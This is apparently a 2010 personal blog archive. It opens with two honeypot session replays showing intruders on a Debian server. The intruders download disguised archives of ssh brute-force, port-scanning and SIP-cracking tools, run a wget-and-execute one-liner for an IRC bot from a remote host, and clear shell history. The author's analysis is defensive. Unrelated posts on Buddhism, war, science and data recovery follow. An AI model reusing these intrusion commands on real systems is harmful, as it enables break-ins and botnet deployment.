cpu cores : 2
apicid : 1
initial apicid : 1
fpu : yes
fpu_exception : yes
cpuid level : 10
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx lm constant_tsc arch_perfmon pebs bts rep_good pni monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr sse4_1 lahf_lm
bogomips : 4266.61
clflush size : 64
cache_alignment : 64
address sizes : 36 bits physical, 48 bits virtual
power management:

sales:~# passwd
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
sales:~# adduser test
Adding user `test' ...
Adding new group `test' (1001) ...
Adding new user `test' (1001) with group `test' ...
Creating home directory `/home/test' ...
Copying files from `/etc/skel' ...
Password:
Password again:

Changing the user information for test
Enter the new value, or press ENTER for the default
Username []: cd
^C
sales:~# Full Name []: cd
sales:~# cd /tmp
sales:/tmp# ls
sales:/tmp# cd /var/tmp
sales:/var/tmp# ls
sales:/var/tmp# cd
sales:~# ls
sales:~# cd /var/tmp
sales:/var/tmp# wget
wget: missing URL
Usage: wget [OPTION]... [URL]...

Try `wget --help' for more options.
sales:/var/tmp# wget gambit.altervista.org/gb.jpg
--2010-10-26 18:04:06-- http://gambit.altervista.org/gb.jpg
Connecting to gambit.altervista.org:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3943354 (3M) [image/jpeg]
Saving to: `gb.jpg

100%[======================================>] 3,943,354 155K/s eta 0s

2010-10-26 18:04:31 (155 KB/s) - `gb.jpg' saved [3943354/3943354]
sales:/var/tmp# tar zxvf gb.jpg
gb
gb/58
gb/12
gb/61
gb/39
gb/60
gb/vuln.txt
gb/57
gb/14
gb/49
gb/38
gb/13
gb/ssh
gb/9
gb/51
gb/15
gb/pscan.c
gb/16
gb/41
gb/30
gb/3
gb/1
gb/54
gb/56
gb/21
gb/34
gb/pscan2
gb/skan
gb/55
gb/59
gb/ps
gb/28
gb/17
gb/31
gb/36
gb/7
gb/52
gb/29
gb/33
gb/common
gb/32
gb/x
gb/62
gb/26
gb/5
gb/23
gb/37
gb/22
gb/10
gb/6
gb/44
gb/50
gb/43
gb/47
gb/2
gb/screen
gb/11
gb/go.sh
gb/48
gb/25
gb/gen-pass.sh
gb/pass_file
gb/45
gb/19
gb/35
gb/18
gb/ss
gb/42
gb/46
gb/20
gb/24
gb/r00t
gb/8
gb/pico
gb/53
gb/4
gb/27
gb/40
sales:/var/tmp# cd gb
sales:/var/tmp/gb# chmod +x *
sales:/var/tmp/gb# ./x 41.243
___
{o,o}
|)__)
-"-"-
O RLY? ^C
sales:/var/tmp/gb# cd
sales:~# cd /var/tmp
sales:/var/tmp# ls
gb.jpg gb
sales:/var/tmp# rm -rf gb
sales:/var/tmp# rm -rf gb.jpg
sales:/var/tmp# wget http://bido.hi2.ro/signed.tgz ; tar xzvf signed.tgz ; rm -rf signed.tgz ; cd ._ ; chmod +x * ; export PATH="." ; sh
--2010-10-26 18:05:17-- http://bido.hi2.ro/signed.tgz
Connecting to bido.hi2.ro:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 891356 (870K) [application/x-gzip]
Saving to: `signed.tgz

100%[======================================>] 891,356 51K/s/s eta 0s

2010-10-26 18:05:35 (51 KB/s) - `signed.tgz' saved [891356/891356]
._
._/configure
._/1.user
._/m.lev
._/m.set
._/checkmech
._/r
._/r/raway.e
._/r/rnicks.e
._/r/rversions.e
._/r/rtsay.e
._/r/rsignoff.e
._/r/rpickup.e
._/r/rsay.e
._/r/rkicks.e
._/r/rinsult.e
._/LinkEvents
._/src
._/src/gencmd.c
._/src/vars.c
._/src/vars.o
._/src/function.c
._/src/global.h
._/src/channel.c
._/src/gencmd
._/src/socket.c
._/src/defines.h
._/src/main.c
._/src/xmech.c
._/src/config.h.in
._/src/dcc.c
._/src/cfgfile.o
._/src/trivia.o
._/src/usage.h
._/src/socket.o
._/src/com-ons.c
._/src/parse.c
._/src/commands.o
._/src/combot.o
._/src/Makefile.in
._/src/parse.o
._/src/text.h
._/src/debug.c
._/src/Makefile
._/src/trivia.c
._/src/commands.c
._/src/structs.h
._/src/link.o
._/src/channel.o
._/src/h.h
._/src/cfgfile.c
._/src/dcc.o
._/src/config.h
._/src/userlist.c
._/src/main.o
._/src/xmech.o
._/src/com-ons.o
._/src/mcmd.h
._/src/link.c
._/src/function.o
._/src/combot.c
._/src/userlist.o
._/src/debug.o
._/Makefile
._/sh
._/pico
._/m.h
._/m.pid
._/bsd
._/2.user
sales:/var/tmp/._# cd
sales:~#
sales:~#
sales:~# cd
sales:~# w
18:05:41 up 14 days, 3:53, 1 user, load average: 0.08, 0.02, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 81.180.208.214 18:02 0.00s 0.00s 0.00s w
sales:~# ls
sales:~# history -c

The archive file gb.jpg looks like a port scanner (pscan2) and an ssh brute-force program like unixcod. You can even see him or her test it using similar syntax to unixcod. Most of the files are dictionary files containing username/password combinations. It would probably be a good idea to install breakingguard or denyhosts on your ssh enabled Linux/Unix/MacOSX system. The archive file, signed.tgz, is the Energymech IRC bot.

The Buddha

2010-10-27T16:19:00.004-05:00

The Buddha is a good show. I bought the DVD and watched it. Two computers wouldn't play it though. Had to watch it on my laptop. DRM on a movie about one of the great spiritual masters that prevents the owner from playing it. What to make of that. This segment is as sad as the Crucifixion of Jesus as depicted in several movies.

Enlightenment Versus Intellect

2010-10-27T07:48:00.002-05:00

If you memorize slogans,
you are unable to make
subtle adaptations according
to the situation.
It is not that there is no
way to teach insight to learners,
but once you have learned a way,
it is essential that you get
it to work completely.
If you just stick to your
teacher's school and memorize slogans,
his is not enlightenment,
it is a part of intellectual knowledge.

- Fayan

BoingBoing Torture Euphemism Generator

2010-10-27T05:56:00.022-05:00

Your browser does not support iframes. Direct link

Original link is here if the iframe is too slow. Where's George Carlin when we need him? This reminds me of Caputo's A Rumor of War. Read pages 166-167 to see how the U.S. Army describes what happens to someone who steps on a mine made from a 155mm artillery shell, what the military calls an IED today. (Yes, they had IEDs in Vietnam.) I suppose an optimist would say we are making progress when many of our veterans only come home maimed and brain-damaged instead of in little tiny fragments.

The MSM supported the government during the Vietnam War and they support the government now. When the MSM quits supporting the wars overseas, then the government will look for the exits. But the MSM only quits after it is obvious that the Army is losing and the people have already decided that the war was folly and waste to begin with.

I believe that the latest fad in national defense policy circles to to pull out Vietnam analyses and substitute the words Afghanistan and Taliban for North Vietnam and Viet Cong/NVA. The North Vietnamese knew they could outlast us. Even if we won every battle, they still won the war making our role in Vietnam pointless. The Taliban have the same incentive. They can lose every battle and still win the war. Our only way to victory is to uplift Afghan society such that the Taliban and their agenda become meaningless. That won't happen because the focus isn't to win through rebuilding the society, but to destroy an enemy that operates like a ghost in the night. Our military trains people to kill the "enemy" and the emphasis is on destruction of the enemy and the enemy's society which we already occupy. Using the military for nation building only happened once after World War II when we rebuilt Germany and Japan after both countries had thoroughly been destroyed. WWII was the exception, not the rule. Every successful American conflict has been one of subjugation followed by colonization or, the equivalent, building military bases in those countries.

If we were serious about winning and rebuilding Afghanistan, we'd have sent 10,000 extra troops into the country instead of 30,000 extra troops. They'd have been combat engineers who could have built roads. The money saved from not sending the other 20,000 troops (roughly $20,000,000,000 or more) could have been given to the Afghans through NGOs to build schools and infrastructure and improve their quality of living through their own hard work and labor. Instead we piss lives and money away chasing ghosts, supporting a corrupt government, and using the latest hardware when we know that good old B-52s, A-10s, donkeys, Chinooks, and M-14s work better in country than B-1s, B-2s, humvees, MRAPS, F-22s, and M-4s. Vietnam Part II. Nothing seems to change with current American military doctrine except the terminology used to describe it.

Searching for Extraterrestrial Life

2010-10-25T09:28:00.003-05:00

SETI will likely not succeed. The interval when a civilization uses radio waves is quite small compared to the life span of a civilization. It is far more likely that exoplanet hunters will find an advanced civilization before SETI does. Think about it. With the recent paper on planetary orbital engineering where planets are moved into favorable orbits, what would the implications be to any exoplanet astronomer? If I saw two or more planets in the same or very close orbits within the habitable region of a solar system, I'd know that chances are they didn't get there by themselves. It would be very cool if Kepler or a Kepler like mission actually found a solar system where the planets have been moved by intelligent beings. Such a system would last a very long time provided the orbital solutions were properly calculated.

A Lunar Desert Isn't That Wet

2010-10-25T09:15:00.003-05:00

I'm not sure what to make of these results. I am not a planetary scientist, but there was no blatant traces of water when the Centaur stage impacted on the Moon. Some of this water is likely non-existent, just hydrogen ions trapped in the lunar regolith. The news reports have been hyping that the Moon is a lot wetter than we thought. It is highly likely that the Moon is a drier desert than any desert on Earth. It is quite probable that the earthly deserts look like rain forests compared to the aridity of the Moon.

Perhaps in 100-250 years if the scientific pace keeps up, we'll be able to terraform our Moon and make it a green and blue ball in our sky. A silver Moon will be a memory of the past. Arthur C. Clarke wrote a story featuring a Russian scientist who was accidentally killed by a plant he created that could live and thrive on the Moon. Can you imagine lunar redwoods that dwarf the redwoods in the Pacific Northwest? We'd have to import a lot of icy comets from the Oort Cloud, but likely, the water we need is there.

Why Medical Research (and Economics Research) is Wrong?

2010-10-24T07:14:00.007-05:00

There is an Atlantic article entitled, "Lies, Damn Lies, and Medical Science". It's about the finding of a small group of researchers led by Dr. John Ioannidis who are showing how flawed the academic biomedical research establishment's findings are. This is not a bad thing. Science only progresses through self examination, self reflection, and checking assumptions. Any field of science or academic research will have a percentage of incorrect results being published. The question is, what is that percentage? The "harder" the science, the lower the percentage of bad or flawed publications. The softer the science or the more perverse the incentives to succeed, the more publications will be bad, flawed, or fraudulent. The following is from a comment I posted on NakedCapitalism.

The Atlantic article appears to support Sturgeon’s Revelation that 90% of everything humans produce is crud. I once had a discussion with my thesis advisor about scientific results due to a scientific misconduct case occurring in the early 1990’s. His belief was that in that particular Nobel Prize winner’s lab, that the pressure to produce was so great that at least 30% of results emanating from that lab were either flawed or fabricated. The problem is that if caught fabricating evidence, the researcher’s career is effectively over. In biomedical research, it is easier to fabricate evidence in obscure fields or areas where one’s results are not likely to be checked. The more prestigious the result, the less likely false or misleading evidence will go unnoticed because others will try to reproduce the results and fail. This is how cheaters are caught.

Even then, some studies are flawed due to environmental factors. Scientists who work with mice found out that different treatment results from the same treatment with different mouse strains could be minimized if they limited food intake shortly before the study began. Different mouse strains giving different results for the same treatment go back 70 years or more. Recently, they discovered that having mice in different cages affected study results.

With medical papers, it’s more difficult to catch frauds. Add in the uncertainty of mice studies and multiply the effect with humans. Every person is unique in genotype and phenotype. We are not at all like inbred mouse strains. Add in insufficient statistical sample sizes, bad statistical analysis, sloppy methodology, environmental and psychological effects, and it’s difficult to tell if the author is incompetent or a fraud. Generally, with frauds, the results are too good to be true, and the methodology is sound, but the results are unreproducible. But, the poor quality of clinical medical articles seems to have been a given for some time.

What the Atlantic article didn’t discuss is the difference in publications between researchers in fields with dedicated funding such as Germany versus America. German researchers generally don’t have to worry about publishing to obtain funding. Their funding is dedicated, so the publish or perish linkage is broken. Therefore, there is less pressure to be “right” or prove others wrong for career or professional advancement. Since the US publishes a great deal more research than any other nation or even group of nations, the results will be skewed by our publish or perish system. It would be informative to know who is getting correct results rather than who is getting it wrong for prestige or profit. Until the incentives are fixed and proper methodologies followed, nothing will change in medicine, economics, or any other field of human endeavor.

Surgical File Recovery using the MFT and File Based Imaging

2010-10-23T05:50:00.003-05:00

This is a rather new technology demoed by Scott A. Moulton utilizing the $MFT and $Bitmap files and a special machine:

Outerz0ne 6 - Hard Drive Kung Fu Magic 1
Outerz0ne 6 - Hard Drive Kung Fu Magic 2
Outerz0ne 6 - Hard Drive Kung Fu Magic 3
Outerz0ne 6 - Hard Drive Kung Fu Magic 4
Outerz0ne 6 - Hard Drive Kung Fu Magic 5

SSD Data Recovery and Forensics and the Lack Thereof

2010-10-23T05:35:00.004-05:00

Scott Moulton has posted two talks on Solid State Disk drives and data recovery/forensics.

Solid State Drives will Ruin Forensics:

Solid State Drives will Ruin Forensics Part 1/5
Solid State Drives will Ruin Forensics Part 2/5
Solid State Drives will Ruin Forensics Part 3/5
Solid State Drives will Ruin Forensics Part 4/5
Solid State Drives will Ruin Forensics Part 5/5

SSD Flash Hard Drives - Shmoocon 2008:

SSD Flash Hard Drives - Shmoocon 2008 - 1/6
SSD Flash Hard Drives - Shmoocon 2008 - 2/6
SSD Flash Hard Drives - Shmoocon 2008 - 3/6
SSD Flash Hard Drives - Shmoocon 2008 - 4/6
SSD Flash Hard Drives - Shmoocon 2008 - 5/6
SSD Flash Hard Drives - Shmoocon 2008 - 6/6

Scott Moulton on RAID

2010-10-23T05:13:00.002-05:00

I am posting more of Scott Moulton's presentations to make it easier for people to find the relevant information. None of this information is mine, and I make no claims to it. It is highly unusual for a person such as Scott to teach such useful knowledge in such a tight lipped field as data recovery and digital forensics.

Dynamic Disk Array Data Recovery (Windows LDM)

RAID Data Recovery Presentation:
RAID Reassembly by Sight and Sound Part 1/6
RAID Reassembly by Sight and Sound Part 2/6
RAID Reassembly by Sight and Sound Part 3/6
RAID Reassembly by Sight and Sound Part 4/6
RAID Reassembly by Sight and Sound Part 5/6
RAID Reassembly by Sight and Sound Part 6/6

His Defcon17 RAID speech (pdf).
FreeSoftwareMagazine article and source code.
R-Tools Technology RAID Presentation.
RAID 5 perl script:

#!/usr/bin/perl -w

#
# raid5 perl utility
# Copyright (C) 2005 Mike Hardy <[EMAIL PROTECTED]>
#
# This script understands the default linux raid5 disk layout,
# and can be used to check parity in an array stripe, or to calculate
# the data that should be present in a chunk with a read error.
#
# Constructive criticism, detailed bug reports, patches, etc gladly accepted!
#
# Thanks to Ashford Computer Consulting Service for their handy RAID
information:
# http://www.accs.com/p_and_p/RAID/index.html
#
# Thanks also to the various linux kernel hackers that have worked on 'md',
# the header files and source code were quite informative when writing this.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2, or (at your option)
# any later version.
#
# You should have received a copy of the GNU General Public License
# (for example /usr/src/linux/COPYING); if not, write to the Free
# Software Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
#

my @array_components = (
"/dev/loop0",
"/dev/loop1",
"/dev/loop2",
"/dev/loop3",
"/dev/loop4",
"/dev/loop5",
"/dev/loop6",
"/dev/loop7"
);

my $chunk_size = 64 * 1024; # chunk size is 64K
my $sectors_per_chunk = $chunk_size / 512;

# Problem - I have a bad sector on one disk in an array
my %component = (
"sector" => 2032,
"device" => "/dev/loop3"
);

# 1) Get the array-related info for that sector
# 2) See if it was the parity disk or not
# 2a) If it was the parity disk, calculate the parity
# 2b) If it was not the parity disk, calculate its value from parity
# 3) Write the data back into the sector

(
$component{"array_chunk"},
$component{"chunk_offset"},
$component{"stripe"},
$component{"parity_device"}
) = &getInfoForComponentAddress($component{"sector"}, $component{"device"});

foreach my $KEY (keys(%component)) {
print $KEY . " => " . $component{$KEY} . "\n";
}

# We started with the information on the bad sector, and now we know how it
fits into the array
# Lets see if we can fix the bad sector with the information at hand

# Build up the list of devices to xor in order to derive our value
my $xor_count = -1;
for (my $i = 0; $i <= $#array_components; $i++) {

# skip ourselves as we roll through
next if ($component{"device"} eq $array_components[$i]);

# skip the parity chunk as we roll through
next if ($component{"parity_device"} eq $array_components[$i]);

$xor_devices{++$xor_count} = $array_components[$i];

print
"Adding xor device " .
$array_components[$i] . " as xor device " .
$xor_count . "\n";
}

# If we are not the parity device, put the parity device at the end
if (!($component{"device"} eq $component{"parity_device"})) {

$xor_devices{++$xor_count} = $component{"parity_device"};

print
"Adding parity device " .
$component{"parity_device"} . " as xor device " .
$xor_count . "\n";
}

# pre-calculate the device offset, and initialize the xor buffer
my $device_offset = $component{"stripe"} * $sectors_per_chunk;
my $xor_result = "0" x ($sectors_per_chunk * 512);

# Read in the chunks and feed them into the xor buffer
for (my $i = 0; $i <= $xor_count; $i++) {

print
"Reading in chunk on stripe " .
$component{"stripe"} . " (sectors " .
$device_offset . " - " .
($device_offset + $sectors_per_chunk) . ") of device " .
$xor_devices{$i} . "\n";

# Open the device and read this chunk in
open(DEVICE, "<" . $xor_devices{$i})
|| die "Unable to open device " . $xor_devices{$i} . ": " . $! . "\n";
seek(DEVICE, $device_offset, 0)
|| die "Unable to seek to " . $device_offset . " device " .
$xor_devices{$i} . ": " . $! . "\n";
read(DEVICE, $data, ($sectors_per_chunk * 512))
|| die "Unable to read device " . $xor_devices{$1} . ": " . $! . "\n";
close(DEVICE);

# Convert binary to hex for printing
my $hexdata = unpack("H*", pack ("B*", $data));
#print "Got data '" . $hexdata . "' from device " . $xor_devices{$i} . "\n";

# xor the data in there
$xor_result ^= $data;
}

my $hex_xor_result = unpack("H*", pack ("B*", $xor_result));
#print "got hex xor result '" . $hex_xor_result . "'\n";

#########################################################################################
# Testing only -
# Check to see if the result I got is the same as what is in the block
open (DEVICE, "<" . $component{"device"})
|| die "Unable to open device " . $compoent{"device"} . ": " . $! . "\n";
seek(DEVICE, $device_offset, 0)
|| die "Unable to seek to " . $device_offset . " device " .
$xor_devices{$i} . ": " . $! . "\n";
read(DEVICE, $data, ($sectors_per_chunk * 512))
|| die "Unable to read device " . $xor_devices{$1} . ": " . $! . "\n";
close(DEVICE);

# Convert binary to hex for printing
my $hexdata = unpack("H*", pack ("B*", $data));
#print "Got data '" . $hexdata . "' from device " . $component{"device"} . "\n";

# Do the comparison, and report what we've got
if (!($hexdata eq $hex_xor_result)) {
print "The value from the device, and the computed value from parity are
inequal for some reason...\n";
}
else {
print "Device value matches what we computed from other devices. Score!\n";
}
#########################################################################################

# Given an array component, and a sector address in that component, we want
# 1) the disk/sector combination for the start of its stripe
# 2) the disk/sector combination for the start of its parity
sub getInfoForComponentAddress() {

# Get our arguments into (hopefully) well-named variables
my $sector = shift();
my $device = shift();

print "determining info for sector "
. $sector . " on "
. $device . "\n";

# Get the stripe number
my $stripe = int($sector / $sectors_per_chunk);
print "stripe number is " . $stripe . "\n";

# Get the offset in the stripe
my $chunk_offset = $sector % $sectors_per_chunk;
print "chunk offset is " . $chunk_offset . "\n";

# See what device index our device is
my $device_index = 0;
for ($i = 0; $i <= $#array_components; $i++) {
if ($device eq $array_components[$i]) {
$device_index = $i;
print "This disk is device " . $device_index . " in the array\n";
}
}

# Figure out which disk holds parity for this stripe
# FIXME only handling the default left-asymmetric style right now
my $parity_device_index = ($#array_components) - ($stripe %
$array_components);
print "parity device index for stripe " . $stripe . " is " .
$parity_device_index . "\n";
my $parity_device = $array_components[$parity_device_index];

# Figure out which chunk of the array this is
# FIXME only handling the default left-asymmetric style right now
my $array_chunk = $stripe * ($array_components - 1) + $device_index;
if ($device_index > $parity_device_index) {
$array_chunk--;
}

# Check for the special case where this device *is* the parity device and
return special
if ($device_index == $parity_device_index) {
$array_chunk = -1;
}

return (
$array_chunk,
$chunk_offset,
$stripe,
$parity_device
);
}

Hard Drive Data Recovery Splained by Scott Moulton

2010-10-21T02:32:00.021-05:00

Scott Moulton of myharddrivedied.com teaches hard drive data recovery and forensics. Here are a series of talks about hard drives. The first talk is a top ten useful hard drive trivia talk. The DIY talk is very informative and tells you what software is the most useful for data recovery, and what you can and can't fix if you lose a drive.

Ten Cool Things You Did Not Know About Your Hard Drive.

DIY Hard Drive Diagnostics Presentation. (7/7)

Other presentations are here. His youtubechannel is here. The Defcon 14 talk isn't as informative as the DIY Hard Drive Diagnostics presentation, but it is still valuable.

Some tips:

Software:
MHDD, Victoria, ddrescue, NTFS Explorer, Secure Erase
Overwriting the data on the drive one time will ensure that any sensitive date is gone forever. There is no need to overwrite the disk multiple times, but Secure Erase is a much faster and safer way to destroy sensitive data.

Hardware:
After 2006, chances are you will have a firmware or board problem. WD drives with triangular integrated electronics boards can not be fixed simply by replacing the boards. A ROM chip (U12) has to be moved from the old board onto the replacement board. Also, never open a WD drive without some research. The way the hard drives are manufactured, if the case is opened, chances are that you will misalign the platters and then you are screwed because there's no way to realign the platters to recover the data. The drive may be repaired, but the data is lost. Here's a video presentation by another data recovery firm, ACSData.

The outer edge of the drive is the fastest part of the hard drive. Your first partition goes there. Many operating systems partition the drive such that the places where you want the greatest performance are at the worst location, closer to the spindle. Basically, you want the swap partition to be the last partition and the database partition to be the first partition. Ubuntu's default install partitions the drive very suboptimally. My Debian (apttosid) laptop is partitioned properly, but my Ubuntu KVM server/workstation isn't. :-\ I'm glad that I at least had clue enough to use ddrescue for data recovery issues in the past.

Backup, backup, backup! SCSI drives are superior to ATA drives. Today's ATA drives are so cheaply made that their failure rate has gone through the roof. That said, 70% of drive failures are recoverable via software such as a Knoppix live CD with ddrescue and testdisk. 10% of the remaining failures are the IDE PCB which in some cases can be replaced easily (see onepcbsolution.com). So, 80% of the time, hard drives' data can be recovered without opening the hard drive. USB flash memory and other forms of flash memory are the discards from Cisco and other NAND flash memory manufacturers/users. Also, flash memory will fail after 10 years without periodic recharging. SSD drives can not be easily recovered since you would have to desolder and move the chips from one board to another. Yikes!

Bad Headlines

2010-10-19T14:36:00.007-05:00

Happy Days's Tom Bosley Dead at first glance registered as "Happy Days, Tom Bosley Dead at 83" just glancing at Google News. Couldn't they have worded it a bit better?

More than one tool for the Fed at first glance on the Calculated Risk blog seemed to read "More than one fool for the Fed".

The latter one probably offers a glimpse into my twisted little mind.

Snooping Kit Phone Creeper v0.95 Released for Windows Mobiles

2010-10-19T11:10:00.002-05:00

One reason not to own a Windows mobile phone.

Just Say No to Plagiarism!

2010-10-18T17:54:00.004-05:00

Plagiarism is just plain wrong! Copyright protections were developed to protect writers and their livelihoods. Stealing someone else's article in whole or in part is a form of theft. A while back, Peter Coates at Australia by the Indian Ocean had a blog posting plagiarized. Now, Gonzalo Lira had a recent post plagiarized by Cumberland Advisors. It doesn't matter whether the theft was large or small, it's wrong and unethical! I'm not condemning someone for lifting a sentence and using that in their blog or email. I am admonishing people for lifting whole paragraphs if not whole articles. It's not that difficult to give an attribution to the author or source when you reference someone else's writing and credit should be given where credit is due. We are not China yet! If you want to plagiarize, move to China where copyrights mean little.

This World is as Tenuous as a Dream

2010-10-15T05:33:00.002-05:00

The world is unstable, like a house on fire. This is not a place where you stay long. The murderous haunt of impermanence comes upon you in a flash, no matter whether you are rich or poor, old or young. If you want to be no different from a Zen master or a buddha, just do not seek outwardly.

- Lin Chi (d 867)

"The natural selection of phenotypes cannot in itself produce cumulative change, because phenotypes are extremely temporary manifestations...Socrates...may have been very successful in the evolutionary sense of leaving numerous offspring. His phenotype, nevertheless, was utterly destroyed by the hemlock and has never since been duplicated...The same argument also holds for genotypes. With Socrates' death, not only did his phenotype disappear but also his genotype...because meiosis and recombination destroy genotypes as surely as death...It is only the meiotically dissociated fragments of the genotype that are transmitted in sexual reproduction, and these fragments are further fragmented by meiosis in the next generation. If there is an ultimate indivisible fragment it is, by definition, ‘the gene’ that is treated in the abstract discussions of population genetics."

George C. Williams (1926-2010)

Barry Ritholtz Interview on The Keiser Report

2010-10-12T18:59:00.004-05:00

Barry Ritholtz's blog, The Big Picture, is an informative blog from the perspective of a Wall Street money manager. The whole show is here.

More Information on Sipvicous Attacks

2010-10-09T18:12:00.009-05:00

I have more information on the sipvicious attacks. A monitored system was successfully attacked today. Unfortunately, the connection was lost. Something caused the WAN interface on my DSL router to fail. The attacker had a Romanian IP address, 89.42.192.73, which is likely a dynamically assigned IP address because a reverse lookup gives 73.192.42.89.in-addr.arpa domain name pointer 73-192-42-89.uen.ro.

The breach occurred around timestamp 2010-10-09 19:11:43 in my logs.

Here's a replay of the actions of the attacker:

sales:~# w
19:11:47 up 14 days, 3:53, 1 user, load average: 0.08, 0.02, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 89.42.192.73 19:11 0.00s 0.00s 0.00s w
sales:~# uname -a
Linux sales 2.6.26-2-686 #1 SMP Wed Nov 4 20:45:37 UTC 2009 i686 GNU/Linux
sales:~# cat /etc/issue
Debian GNU/Linux 5.0 \n \l

sales:~# cat /proc/cpuinfo
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 23
model name : Intel(R) Core(TM)2 Duo CPU E8200 @ 2.66GHz
stepping : 6
cpu MHz : 2133.305
cache size : 6144 KB
physical id : 0
siblings : 2
core id : 0
cpu cores : 2
apicid : 0
initial apicid : 0
fpu : yes
fpu_exception : yes
cpuid level : 10
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx lm constant_tsc arch_perfmon pebs bts rep_good pni monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr sse4_1 lahf_lm
bogomips : 4270.03
clflush size : 64
cache_alignment : 64
address sizes : 36 bits physical, 48 bits virtual
power management:

processor : 1
vendor_id : GenuineIntel
cpu family : 6
model : 23
model name : Intel(R) Core(TM)2 Duo CPU E8200 @ 2.66GHz
stepping : 6
cpu MHz : 2133.305
cache size : 6144 KB
physical id : 0
siblings : 2
core id : 1
cpu cores : 2
apicid : 1
initial apicid : 1
fpu : yes
fpu_exception : yes
cpuid level : 10
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx lm constant_tsc arch_perfmon pebs bts rep_good pni monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr sse4_1 lahf_lm
bogomips : 4266.61
clflush size : 64
cache_alignment : 64
address sizes : 36 bits physical, 48 bits virtual
power management:

sales:~# cd /var/tmp/
sales:/var/tmp# ls
sales:/var/tmp# yum -y install gcc sendmail screen
bash: yum: command not found
sales:/var/tmp# apt-get install gcc sendmail screen
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
gcc screen sendmail
0 upgraded, 3 newly installed, 0 to remove and 259 not upgraded.
Need to get 1302.2kB of archives.
After this operation, 2864.4kB of additional disk space will be used.
Get:1 http://ftp.debian.org stable/main gcc 1.10-5 [352.2kB]
Get:2 http://ftp.debian.org stable/main screen 0.23-5 [179.2kB]
Get:3 http://ftp.debian.org stable/main sendmail 0.11-1 [771.2kB]
Fetched 1302.2kB in 1s (4493B/s)
Reading package fields... Done
Reading package status... Done
(Reading database ... 177887 files and directories currently installed.)
Unpacking gcc (from .../archives/gcc_1.10-5_i386.deb) ...
Unpacking screen (from .../archives/screen_0.23-5_i386.deb) ...
Unpacking sendmail (from .../archives/sendmail_0.11-1_i386.deb) ...
Processing triggers for man-db ...
Setting up gcc (1.10-5) ...
Setting up screen (0.23-5) ...
Setting up sendmail (0.11-1) ...
sales:/var/tmp# mkdir :">..
sales:/var/tmp# mkdir "..."
sales:/var/tmp# cd "..."
sales:/var/tmp/...# wget http://wed2010.ucoz.com/sip.tgz
--2010-10-09 19:16:19-- http://wed2010.ucoz.com/sip.tgz
Connecting to wed2010.ucoz.com:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 388072 (378K) [application/octet-stream]
Saving to: `sip.tgz

100%[======================================>] 388,072 255K/s eta 0s

2010-10-09 19:16:20 (255 KB/s) - `sip.tgz' saved [388072/388072]
sales:/var/tmp/...# tar zxvf s
tar: s: Cannot open: No such file or directory
tar: Error is not recoverable: exiting now
tar: Child returned status 2
tar: Error exit delayed from previous errors
sales:/var/tmp/...# locatre
sales:/var/tmp/...# locate sip.conf
bash: locate: command not found
sales:/var/tmp/...# apt-get install locate
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
locate
0 upgraded, 1 newly installed, 0 to remove and 259 not upgraded.
Need to get 542.2kB of archives.
After this operation, 1192.4kB of additional disk space will be used.
Get:1 http://ftp.debian.org stable/main locate 1.37-9 [542.2kB]
Fetched 542.2kB in 1s (4493B/s)
Reading package fields... Done
Reading package status... Done
(Reading database ... 177887 files and directories currently installed.)
Unpacking locate (from .../archives/locate_1.37-9_i386.deb) ...
Processing triggers for man-db ...
Setting up locate (1.37-9) ...
sales:/var/tmp/...# locate sip.conf
locate: Segmentation fault
sales:/var/tmp/...# ls
sip.tgz
sales:/var/tmp/...# tar zxvf sip.tgz
sip
sip/useri
sip/totag
sip/TODO
sip/THANKS
sip/svwar.py
sip/svreport.py
sip/svmap.py
sip/svlearnfp.py
sip/svcrack.py
sip/sv.xsl
sip/staticheaders
sip/staticfull
sip/regen.pyc
sip/regen.py
sip/README
sip/pptable.pyc
sip/pptable.py
sip/parole
sip/helper.pyc
sip/helper.py
sip/HELP
sip/groupdb
sip/go
sip/fphelper.pyc
sip/fphelper.py
sip/Changelog
sip/.svn
sip/.svn/tmp
sip/.svn/tmp/text-base
sip/.svn/tmp/props
sip/.svn/tmp/prop-base
sip/.svn/text-base
sip/.svn/text-base/totag.svn-base
sip/.svn/text-base/TODO.svn-base
sip/.svn/text-base/THANKS.svn-base
sip/.svn/text-base/svwar.py.svn-base
sip/.svn/text-base/svreport.py.svn-base
sip/.svn/text-base/svmap.py.svn-base
sip/.svn/text-base/svlearnfp.py.svn-base
sip/.svn/text-base/svcrack.py.svn-base
sip/.svn/text-base/sv.xsl.svn-base
sip/.svn/text-base/staticheaders.svn-base
sip/.svn/text-base/staticfull.svn-base
sip/.svn/text-base/regen.py.svn-base
sip/.svn/text-base/README.svn-base
sip/.svn/text-base/pptable.py.svn-base
sip/.svn/text-base/helper.py.svn-base
sip/.svn/text-base/groupdb.svn-base
sip/.svn/text-base/fphelper.py.svn-base
sip/.svn/text-base/Changelog.svn-base
sip/.svn/props
sip/.svn/prop-base
sip/.svn/prop-base/totag.svn-base
sip/.svn/prop-base/svwar.py.svn-base
sip/.svn/prop-base/svreport.py.svn-base
sip/.svn/prop-base/svmap.py.svn-base
sip/.svn/prop-base/svlearnfp.py.svn-base
sip/.svn/prop-base/svcrack.py.svn-base
sip/.svn/prop-base/staticheaders.svn-base
